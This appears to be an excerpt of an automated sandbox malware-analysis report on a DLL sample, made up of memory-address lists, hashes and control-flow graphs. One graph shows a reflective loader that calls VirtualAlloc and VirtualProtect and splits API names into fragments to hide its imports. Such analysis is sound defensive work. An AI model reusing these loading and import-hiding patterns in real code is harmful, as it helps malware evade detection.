                                                                                                        0x7ffc289186c7
                                                                                                        0x7ffc289186cf
                                                                                                        0x7ffc289186d7
                                                                                                        0x7ffc289186df
                                                                                                        0x7ffc289186e7
                                                                                                        0x7ffc289186ef
                                                                                                        0x7ffc289186f7
                                                                                                        0x7ffc289186ff
                                                                                                        0x7ffc28918707
                                                                                                        0x7ffc2891870f
                                                                                                        0x7ffc28918717
                                                                                                        0x7ffc2891871f
                                                                                                        0x7ffc28918727
                                                                                                        0x7ffc2891872f
                                                                                                        0x7ffc28918737
                                                                                                        0x7ffc2891873f
                                                                                                        0x7ffc28918747
                                                                                                        0x7ffc2891874f
                                                                                                        0x7ffc28918757
                                                                                                        0x7ffc2891875f
                                                                                                        0x7ffc28918767
                                                                                                        0x7ffc2891876f
                                                                                                        0x7ffc28918777
                                                                                                        0x7ffc2891877f
                                                                                                        0x7ffc28918787
                                                                                                        0x7ffc2891878f
                                                                                                        0x7ffc28918797
                                                                                                        0x7ffc2891879f
                                                                                                        0x7ffc289187a7
                                                                                                        0x7ffc289187af
                                                                                                        0x7ffc289187b7
                                                                                                        0x7ffc289187bf
                                                                                                        0x7ffc289187c7
                                                                                                        0x7ffc289187cf
                                                                                                        0x7ffc289187d7
                                                                                                        0x7ffc289187df
                                                                                                        0x7ffc289187e7
                                                                                                        0x7ffc289187ef
                                                                                                        0x7ffc289187f7
                                                                                                        0x7ffc289187ff
                                                                                                        0x7ffc28918807
                                                                                                        0x7ffc2891880f
                                                                                                        0x7ffc28918817
                                                                                                        0x7ffc2891881f
                                                                                                        0x7ffc28918827
                                                                                                        0x7ffc2891882f
                                                                                                        0x7ffc28918837
                                                                                                        0x7ffc2891883f
                                                                                                        0x7ffc28918847
                                                                                                        0x7ffc2891884f
                                                                                                        0x7ffc28918857
                                                                                                        0x7ffc2891885f
                                                                                                        0x7ffc28918867
                                                                                                        0x7ffc2891886f
                                                                                                        0x7ffc28918877
                                                                                                        0x7ffc2891887f
                                                                                                        0x7ffc28918887
                                                                                                        0x7ffc2891888f
                                                                                                        0x7ffc28918897
                                                                                                        0x7ffc2891889f
                                                                                                        0x7ffc289188a7
                                                                                                        0x7ffc289188af
                                                                                                        0x7ffc289188b7
                                                                                                        0x7ffc289188bf
                                                                                                        0x7ffc289188c7
                                                                                                        0x7ffc289188cf
                                                                                                        0x7ffc289188d7
                                                                                                        0x7ffc289188df
                                                                                                        0x7ffc289188e7
                                                                                                        0x7ffc289188ef
                                                                                                        0x7ffc289188f7
                                                                                                        0x7ffc289188ff
                                                                                                        0x7ffc28918907
                                                                                                        0x7ffc2891890f
                                                                                                        0x7ffc28918917
                                                                                                        0x7ffc2891891f
                                                                                                        0x7ffc28918927
                                                                                                        0x7ffc2891892f
                                                                                                        0x7ffc28918937
                                                                                                        0x7ffc2891893f
                                                                                                        0x7ffc28918947
                                                                                                        0x7ffc2891894f
                                                                                                        0x7ffc28918957
                                                                                                        0x7ffc2891895f
                                                                                                        0x7ffc28918967
                                                                                                        0x7ffc2891896f
                                                                                                        0x7ffc28918977
                                                                                                        0x7ffc2891897f
                                                                                                        0x7ffc28918987
                                                                                                        0x7ffc2891898f
                                                                                                        0x7ffc28918997
                                                                                                        0x7ffc2891899f
                                                                                                        0x7ffc289189a7
                                                                                                        0x7ffc289189af
                                                                                                        0x7ffc289189b7
                                                                                                        0x7ffc289189bf
                                                                                                        0x7ffc289189c7
                                                                                                        0x7ffc289189cf
                                                                                                        0x7ffc289189d7
                                                                                                        0x7ffc289189df
                                                                                                        0x7ffc289189e7
                                                                                                        0x7ffc289189ef
                                                                                                        0x7ffc289189f7
                                                                                                        0x7ffc289189ff
                                                                                                        0x7ffc28918a07
                                                                                                        0x7ffc28918a0f
                                                                                                        0x7ffc28918a17
                                                                                                        0x7ffc28918a1f
                                                                                                        0x7ffc28918a27
                                                                                                        0x7ffc28918a2f
                                                                                                        0x7ffc28918a37
                                                                                                        0x7ffc28918a3f
                                                                                                        0x7ffc28918a47
                                                                                                        0x7ffc28918a4f
                                                                                                        0x7ffc28918a57
                                                                                                        0x7ffc28918a5f
                                                                                                        0x7ffc28918a67
                                                                                                        0x7ffc28918a6f
                                                                                                        0x7ffc28918a77
                                                                                                        0x7ffc28918a7f
                                                                                                        0x7ffc28918a87
                                                                                                        0x7ffc28918a8f
                                                                                                        0x7ffc28918a97
                                                                                                        0x7ffc28918a9f
                                                                                                        0x7ffc28918aa7
                                                                                                        0x7ffc28918aaf
                                                                                                        0x7ffc28918ab7
                                                                                                        0x7ffc28918abf
                                                                                                        0x7ffc28918ac7
                                                                                                        0x7ffc28918acf
                                                                                                        0x7ffc28918ad7
                                                                                                        0x7ffc28918adf
                                                                                                        0x7ffc28918ae7
                                                                                                        0x7ffc28918aef
                                                                                                        0x7ffc28918af7
                                                                                                        0x7ffc28918aff
                                                                                                        0x7ffc28918b07
                                                                                                        0x7ffc28918b0f
                                                                                                        0x7ffc28918b17
                                                                                                        0x7ffc28918b1f
                                                                                                        0x7ffc28918b27
                                                                                                        0x7ffc28918b2f
                                                                                                        0x7ffc28918b37
                                                                                                        0x7ffc28918b3f
                                                                                                        0x7ffc28918b47
                                                                                                        0x7ffc28918b4f
                                                                                                        0x7ffc28918b57
                                                                                                        0x7ffc28918b5f
                                                                                                        0x7ffc28918b67
                                                                                                        0x7ffc28918b6f
                                                                                                        0x7ffc28918b77
                                                                                                        0x7ffc28918b7f
                                                                                                        0x7ffc28918b87
                                                                                                        0x7ffc28918b8f
                                                                                                        0x7ffc28918b97
                                                                                                        0x7ffc28918b9f
                                                                                                        0x7ffc28918ba7
                                                                                                        0x7ffc28918baf
                                                                                                        0x7ffc28918bb7
                                                                                                        0x7ffc28918bbf
                                                                                                        0x7ffc28918bc7
                                                                                                        0x7ffc28918bcf
                                                                                                        0x7ffc28918bd7
                                                                                                        0x7ffc28918bdf
                                                                                                        0x7ffc28918be7
                                                                                                        0x7ffc28918bef
                                                                                                        0x7ffc28918bf7
                                                                                                        0x7ffc28918bff
                                                                                                        0x7ffc28918c07
                                                                                                        0x7ffc28918c0f
                                                                                                        0x7ffc28918c17
                                                                                                        0x7ffc28918c1f
                                                                                                        0x7ffc28918c27
                                                                                                        0x7ffc28918c2f
                                                                                                        0x7ffc28918c37
                                                                                                        0x7ffc28918c3f
                                                                                                        0x7ffc28918c47
                                                                                                        0x7ffc28918c4f
                                                                                                        0x7ffc28918c57
                                                                                                        0x7ffc28918c5f
                                                                                                        0x7ffc28918c67
                                                                                                        0x7ffc28918c6f
                                                                                                        0x7ffc28918c77
                                                                                                        0x7ffc28918c7f
                                                                                                        0x7ffc28918c87
                                                                                                        0x7ffc28918c8f
                                                                                                        0x7ffc28918c97
                                                                                                        0x7ffc28918c9f
                                                                                                        0x7ffc28918ca7
                                                                                                        0x7ffc28918caf
                                                                                                        0x7ffc28918cb7
                                                                                                        0x7ffc28918cbf
                                                                                                        0x7ffc28918cc7
                                                                                                        0x7ffc28918ccf
                                                                                                        0x7ffc28918cd7
                                                                                                        0x7ffc28918cdf
                                                                                                        0x7ffc28918ce7
                                                                                                        0x7ffc28918cef
                                                                                                        0x7ffc28918cf7
                                                                                                        0x7ffc28918cff
                                                                                                        0x7ffc28918d07
                                                                                                        0x7ffc28918d0f
                                                                                                        0x7ffc28918d17
                                                                                                        0x7ffc28918d1f
                                                                                                        0x7ffc28918d27
                                                                                                        0x7ffc28918d2f
                                                                                                        0x7ffc28918d37
                                                                                                        0x7ffc28918d3f
                                                                                                        0x7ffc28918d47
                                                                                                        0x7ffc28918d4f
                                                                                                        0x7ffc28918d57
                                                                                                        0x7ffc28918d5f
                                                                                                        0x7ffc28918d67
                                                                                                        0x7ffc28918d6f
                                                                                                        0x7ffc28918d77
                                                                                                        0x7ffc28918d7f
                                                                                                        0x7ffc28918d87
                                                                                                        0x7ffc28918d8f
                                                                                                        0x7ffc28918d97
                                                                                                        0x7ffc28918d9f
                                                                                                        0x7ffc28918da7
                                                                                                        0x7ffc28918daf
                                                                                                        0x7ffc28918db7
                                                                                                        0x7ffc28918dbf
                                                                                                        0x7ffc28918dc7
                                                                                                        0x7ffc28918dcf
                                                                                                        0x7ffc28918dd7
                                                                                                        0x7ffc28918ddf
                                                                                                        0x7ffc28918de7
                                                                                                        0x7ffc28918def
                                                                                                        0x7ffc28918df7
                                                                                                        0x7ffc28918dff
                                                                                                        0x7ffc28918e07
                                                                                                        0x7ffc28918e0f
                                                                                                        0x7ffc28918e17
                                                                                                        0x7ffc28918e1f
                                                                                                        0x7ffc28918e27
                                                                                                        0x7ffc28918e2f
                                                                                                        0x7ffc28918e37
                                                                                                        0x7ffc28918e3f
                                                                                                        0x7ffc28918e47
                                                                                                        0x7ffc28918e4f
                                                                                                        0x7ffc28918e57
                                                                                                        0x7ffc28918e5f
                                                                                                        0x7ffc28918e67
                                                                                                        0x7ffc28918e6f
                                                                                                        0x7ffc28918e77
                                                                                                        0x7ffc28918e7f
                                                                                                        0x7ffc28918e87
                                                                                                        0x7ffc28918e8f
                                                                                                        0x7ffc28918e97
                                                                                                        0x7ffc28918e9f
                                                                                                        0x7ffc28918ea7
                                                                                                        0x7ffc28918eaf
                                                                                                        0x7ffc28918eb7
                                                                                                        0x7ffc28918ebf
                                                                                                        0x7ffc28918ec7
                                                                                                        0x7ffc28918ecf
                                                                                                        0x7ffc28918ed7
                                                                                                        0x7ffc28918edf
                                                                                                        0x7ffc28918ee7
                                                                                                        0x7ffc28918eef
                                                                                                        0x7ffc28918ef7
                                                                                                        0x7ffc28918eff
                                                                                                        0x7ffc28918f07
                                                                                                        0x7ffc28918f0f
                                                                                                        0x7ffc28918f17
                                                                                                        0x7ffc28918f1f
                                                                                                        0x7ffc28918f27
                                                                                                        0x7ffc28918f2f
                                                                                                        0x7ffc28918f37
                                                                                                        0x7ffc28918f3f
                                                                                                        0x7ffc28918f47
                                                                                                        0x7ffc28918f4f
                                                                                                        0x7ffc28918f57
                                                                                                        0x7ffc28918f5f
                                                                                                        0x7ffc28918f67
                                                                                                        0x7ffc28918f6f
                                                                                                        0x7ffc28918f77
                                                                                                        0x7ffc28918f7f
                                                                                                        0x7ffc28918f87
                                                                                                        0x7ffc28918f8f
                                                                                                        0x7ffc28918f97
                                                                                                        0x7ffc28918f9f
                                                                                                        0x7ffc28918fa7
                                                                                                        0x7ffc28918faf
                                                                                                        0x7ffc28918fb7
                                                                                                        0x7ffc28918fbf
                                                                                                        0x7ffc28918fc7
                                                                                                        0x7ffc28918fcf
                                                                                                        0x7ffc28918fd7
                                                                                                        0x7ffc28918fdf
                                                                                                        0x7ffc28918fe7
                                                                                                        0x7ffc28918fef
                                                                                                        0x7ffc28918ff7
                                                                                                        0x7ffc28918fff
                                                                                                        0x7ffc28919007
                                                                                                        0x7ffc2891900f
                                                                                                        0x7ffc28919017
                                                                                                        0x7ffc2891901f
                                                                                                        0x7ffc28919027
                                                                                                        0x7ffc2891902f
                                                                                                        0x7ffc28919037
                                                                                                        0x7ffc2891903f
                                                                                                        0x7ffc28919047
                                                                                                        0x7ffc2891904f
                                                                                                        0x7ffc28919057
                                                                                                        0x7ffc2891905f
                                                                                                        0x7ffc28919067
                                                                                                        0x7ffc2891906f
                                                                                                        0x7ffc28919077
                                                                                                        0x7ffc2891907f
                                                                                                        0x7ffc28919087
                                                                                                        0x7ffc2891908f
                                                                                                        0x7ffc28919097
                                                                                                        0x7ffc2891909f
                                                                                                        0x7ffc289190a7
                                                                                                        0x7ffc289190af
                                                                                                        0x7ffc289190b7
                                                                                                        0x7ffc289190bf
                                                                                                        0x7ffc289190c7
                                                                                                        0x7ffc289190cf
                                                                                                        0x7ffc289190d7
                                                                                                        0x7ffc289190df
                                                                                                        0x7ffc289190e7
                                                                                                        0x7ffc289190ef
                                                                                                        0x7ffc289190f7
                                                                                                        0x7ffc289190ff
                                                                                                        0x7ffc28919107
                                                                                                        0x7ffc2891910f
                                                                                                        0x7ffc28919117
                                                                                                        0x7ffc2891911f
                                                                                                        0x7ffc28919127
                                                                                                        0x7ffc2891912f
                                                                                                        0x7ffc28919137
                                                                                                        0x7ffc2891913f
                                                                                                        0x7ffc28919147
                                                                                                        0x7ffc2891914f
                                                                                                        0x7ffc28919157
                                                                                                        0x7ffc2891915f
                                                                                                        0x7ffc28919167
                                                                                                        0x7ffc2891916f
                                                                                                        0x7ffc28919177
                                                                                                        0x7ffc2891917f
                                                                                                        0x7ffc28919187
                                                                                                        0x7ffc2891918f
                                                                                                        0x7ffc28919197
                                                                                                        0x7ffc2891919f
                                                                                                        0x7ffc289191a7
                                                                                                        0x7ffc289191af
                                                                                                        0x7ffc289191b7
                                                                                                        0x7ffc289191bf
                                                                                                        0x7ffc289191c7
                                                                                                        0x7ffc289191cf
                                                                                                        0x7ffc289191d7
                                                                                                        0x7ffc289191df
                                                                                                        0x7ffc289191e7
                                                                                                        0x7ffc289191f8
                                                                                                        0x7ffc28919200
                                                                                                        0x7ffc28919205
                                                                                                        0x7ffc28919212
                                                                                                        0x7ffc2891921a
                                                                                                        0x7ffc28919224
                                                                                                        0x7ffc2891923e
                                                                                                        0x7ffc28919240
                                                                                                        0x7ffc28919248
                                                                                                        0x7ffc2891924a
                                                                                                        0x7ffc28919257
                                                                                                        0x7ffc28919263
                                                                                                        0x7ffc28919270
                                                                                                        0x7ffc28919275
                                                                                                        0x7ffc2891927c
                                                                                                        0x7ffc28919287
                                                                                                        0x7ffc2891928e
                                                                                                        0x7ffc28919294
                                                                                                        0x7ffc2891929d
                                                                                                        0x7ffc2891929f
                                                                                                        0x7ffc289192a2
                                                                                                        0x7ffc289192ae
                                                                                                        0x7ffc289192b6
                                                                                                        0x7ffc289192bb
                                                                                                        0x7ffc289192d5
                                                                                                        0x7ffc289192db
                                                                                                        0x7ffc289192f5
                                                                                                        0x7ffc28919303
                                                                                                        0x7ffc2891931e
                                                                                                        0x7ffc28919320
                                                                                                        0x7ffc28919328
                                                                                                        0x7ffc2891932d
                                                                                                        0x7ffc28919330
                                                                                                        0x7ffc28919342
                                                                                                        0x7ffc28919358
                                                                                                        0x7ffc2891935f
                                                                                                        0x7ffc2891936a
                                                                                                        0x7ffc28919370
                                                                                                        0x7ffc28919372
                                                                                                        0x7ffc28919380
                                                                                                        0x7ffc28919382
                                                                                                        0x7ffc28919391
                                                                                                        0x7ffc28919396
                                                                                                        0x7ffc2891939e
                                                                                                        0x7ffc289193a5
                                                                                                        0x7ffc289193b8
                                                                                                        0x7ffc289193bd
                                                                                                        0x7ffc289193d0
                                                                                                        0x7ffc289193d5
                                                                                                        0x7ffc289193e1
                                                                                                        0x7ffc28919401

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                                        • API String ID: 0-872547024
                                                                                                        • Opcode ID: c6f11ac01cd25e5a832513a9fe89d775d122b9a7f78f41ae8ad8edaa33a11b99
                                                                                                        • Instruction ID: 9fb854e088c8c77549699e06013090d9c56e4aa051953277e1521ef2154f1eb8
                                                                                                        • Opcode Fuzzy Hash: c6f11ac01cd25e5a832513a9fe89d775d122b9a7f78f41ae8ad8edaa33a11b99
                                                                                                        • Instruction Fuzzy Hash: C7A35E1250DBC1C9E332C23CB45878FAE9193A3319F484299D3E41AADBC7AE8155DF67
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 53 1fd03f40000-1fd03f4029a call 1fd03f4091c * 2 66 1fd03f402a0-1fd03f402a4 53->66 67 1fd03f40905 53->67 66->67 68 1fd03f402aa-1fd03f402ae 66->68 69 1fd03f40907-1fd03f4091a 67->69 68->67 70 1fd03f402b4-1fd03f402b8 68->70 70->67 71 1fd03f402be-1fd03f402c5 70->71 71->67 72 1fd03f402cb-1fd03f402dc 71->72 72->67 73 1fd03f402e2-1fd03f402eb 72->73 73->67 74 1fd03f402f1-1fd03f402fc 73->74 74->67 75 1fd03f40302-1fd03f40312 74->75 76 1fd03f40314-1fd03f4031a 75->76 77 1fd03f4033f-1fd03f40371 GetNativeSystemInfo 75->77 78 1fd03f4031c-1fd03f40324 76->78 77->67 79 1fd03f40377-1fd03f40393 VirtualAlloc 77->79 80 1fd03f4032c-1fd03f4032d 78->80 81 1fd03f40326-1fd03f4032a 78->81 82 1fd03f403aa-1fd03f403ae 79->82 83 1fd03f40395-1fd03f403a8 79->83 84 1fd03f4032f-1fd03f4033d 80->84 81->84 85 1fd03f403b0-1fd03f403c2 82->85 86 1fd03f403dc-1fd03f403e3 82->86 83->82 84->77 84->78 88 1fd03f403d4-1fd03f403d8 85->88 89 1fd03f403fb-1fd03f40417 86->89 90 1fd03f403e5-1fd03f403f9 86->90 93 1fd03f403c4-1fd03f403d1 88->93 94 1fd03f403da 88->94 91 1fd03f40419-1fd03f4041a 89->91 92 1fd03f40458-1fd03f40465 89->92 90->89 90->90 95 1fd03f4041c-1fd03f40422 91->95 96 1fd03f4046b-1fd03f40472 92->96 97 1fd03f40537-1fd03f40542 92->97 93->88 94->89 98 1fd03f40424-1fd03f40446 95->98 99 1fd03f40448-1fd03f40456 95->99 96->97 102 1fd03f40478-1fd03f40485 96->102 100 1fd03f406e6-1fd03f406ed 97->100 101 1fd03f40548-1fd03f40559 97->101 98->98 98->99 99->92 99->95 105 1fd03f406f3-1fd03f40707 100->105 106 1fd03f407ac-1fd03f407c3 100->106 103 1fd03f40562-1fd03f40565 101->103 102->97 104 1fd03f4048b-1fd03f4048f 102->104 107 1fd03f4055b-1fd03f4055f 103->107 108 1fd03f40567-1fd03f40574 103->108 109 1fd03f4051b-1fd03f40525 104->109 110 1fd03f4070d 105->110 111 1fd03f407a9-1fd03f407aa 105->111 112 1fd03f407c9-1fd03f407cd 106->112 113 1fd03f4087a-1fd03f4088d 106->113 107->103 116 1fd03f4060d-1fd03f40619 108->116 117 1fd03f4057a-1fd03f4057d 108->117 114 1fd03f40494-1fd03f404a8 109->114 115 1fd03f4052b-1fd03f40531 109->115 118 1fd03f40712-1fd03f40736 110->118 111->106 119 1fd03f407d0-1fd03f407d3 112->119 135 1fd03f408b3-1fd03f408ba 113->135 136 1fd03f4088f-1fd03f4089a 113->136 122 1fd03f404cf-1fd03f404d3 114->122 123 1fd03f404aa-1fd03f404cd 114->123 115->97 115->104 120 1fd03f406e2-1fd03f406e3 116->120 121 1fd03f4061f 116->121 117->116 124 1fd03f40583-1fd03f4059b 117->124 149 1fd03f40796-1fd03f4079f 118->149 150 1fd03f40738-1fd03f4073e 118->150 126 1fd03f4085f-1fd03f4086d 119->126 127 1fd03f407d9-1fd03f407e9 119->127 120->100 128 1fd03f40625-1fd03f40648 121->128 131 1fd03f404e3-1fd03f404e7 122->131 132 1fd03f404d5-1fd03f404e1 122->132 130 1fd03f40518-1fd03f40519 123->130 124->116 133 1fd03f4059d-1fd03f4059e 124->133 126->119 129 1fd03f40873-1fd03f40874 126->129 137 1fd03f4080d-1fd03f4080f 127->137 138 1fd03f407eb-1fd03f407ed 127->138 164 1fd03f406b2-1fd03f406b7 128->164 165 1fd03f4064a-1fd03f4064b 128->165 129->113 130->109 147 1fd03f404fe-1fd03f40502 131->147 148 1fd03f404e9-1fd03f404fc 131->148 145 1fd03f40511-1fd03f40515 132->145 146 1fd03f405a0-1fd03f40605 133->146 141 1fd03f408eb-1fd03f40903 135->141 142 1fd03f408bc-1fd03f408c4 135->142 151 1fd03f408ab-1fd03f408b1 136->151 143 1fd03f40811-1fd03f40820 137->143 144 1fd03f40822-1fd03f4082b 137->144 139 1fd03f407ef-1fd03f407f9 138->139 140 1fd03f407fb-1fd03f4080b 138->140 153 1fd03f4082e-1fd03f4083d 139->153 140->153 141->69 142->141 159 1fd03f408c6-1fd03f408e9 RtlAvlRemoveNode 142->159 143->153 144->153 145->130 146->146 154 1fd03f40607 146->154 147->130 152 1fd03f40504-1fd03f4050e 147->152 148->145 149->118 160 1fd03f407a5-1fd03f407a6 149->160 155 1fd03f40740-1fd03f40746 150->155 156 1fd03f40748-1fd03f40754 150->156 151->135 157 1fd03f4089c-1fd03f408a8 151->157 152->145 166 1fd03f4083f-1fd03f40845 153->166 167 1fd03f4084b-1fd03f4085c VirtualProtect 153->167 154->116 161 1fd03f4077b-1fd03f4078d 155->161 162 1fd03f40764-1fd03f40776 156->162 163 1fd03f40756-1fd03f40757 156->163 157->151 159->141 160->111 161->149 180 1fd03f4078f-1fd03f40794 161->180 162->161 172 1fd03f40759-1fd03f40762 163->172 169 1fd03f406ce-1fd03f406d8 164->169 170 1fd03f406b9-1fd03f406bd 164->170 173 1fd03f4064e-1fd03f40651 165->173 166->167 167->126 169->128 175 1fd03f406de-1fd03f406df 169->175 170->169 174 1fd03f406bf-1fd03f406c3 170->174 172->162 172->172 177 1fd03f40653-1fd03f40659 173->177 178 1fd03f4065b-1fd03f40666 173->178 174->169 179 1fd03f406c5 174->179 175->120 181 1fd03f4068d-1fd03f406a3 177->181 182 1fd03f40676-1fd03f40688 178->182 183 1fd03f40668-1fd03f40669 178->183 179->169 180->150 186 1fd03f406ac 181->186 187 1fd03f406a5-1fd03f406aa 181->187 182->181 184 1fd03f4066b-1fd03f40674 183->184 184->182 184->184 186->164 187->173
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268078777.000001FD03F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FD03F40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1fd03f40000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocInfoNativeNodeProtectRemoveSystem
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 1419936716-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 10492ae48dbcecaa2f74644ce4bbb4dde6256cf2c3ab67689abddaa17648f2b8
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: D662E230618B0A8BE759DF18E8857BABBE1FB54304F14462DE98BC7251DF34E542CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 469 180004ddc-180004e09 470 180004e0b 469->470 471 180004e10-180004e12 470->471 472 180004e18-180004e1e 471->472 473 1800050ff-1800051e5 call 180028b8c 471->473 474 180004e24-180004e2a 472->474 475 180005017-1800050fa call 180009144 * 2 472->475 485 1800051f6 473->485 486 1800051e7-1800051f1 473->486 478 1800052e9-180005382 call 18001fa08 * 2 474->478 479 180004e30-180004e36 474->479 475->470 493 180005387-180005391 478->493 483 180005211-1800052e4 call 180005ca8 479->483 484 180004e3c-180004e42 479->484 483->493 490 180004e48-180004f3f call 18000eac4 call 1800212dc 484->490 491 180005200-180005206 484->491 492 1800051fb 485->492 486->470 501 180004f44-180005012 call 180002094 490->501 491->493 494 18000520c 491->494 492->491 494->471 501->492
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
